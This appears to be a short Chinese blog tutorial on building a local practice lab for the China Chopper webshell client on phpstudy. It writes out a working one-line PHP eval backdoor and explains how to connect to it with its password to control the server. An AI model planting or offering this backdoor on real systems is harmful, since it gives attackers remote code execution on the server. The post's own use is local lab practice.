sql注入之中国菜刀环演练境搭建与测试

中国菜刀演练环境搭建

需要的工具:

  1. phpstudy
  2. 一句话木马php脚本 <?php @eval($_POST['test']);?>
  3. 菜刀程序

1. 新建一个一句话php木马程序 muma.php,模拟攻击者,将之放入phpstudy的网站根目录

 

 

2. 模拟被攻击者启动phpstudy

3. 攻击者访问一句话木马页面(可选)

4. 打开菜刀,输入木马页面,演示环境是http://127.0.0.1/muma.php,密码是test(一句话密码中的值),环境选择PHP

 

 5. 成功之后,已经进了被攻击者服务器,可以模拟对被攻击者的服务器做一些骚操作了  

 

 

到这

 

posted @ 2020-12-15 22:25  云烟三渺  阅读(334)  评论(0编辑  收藏  举报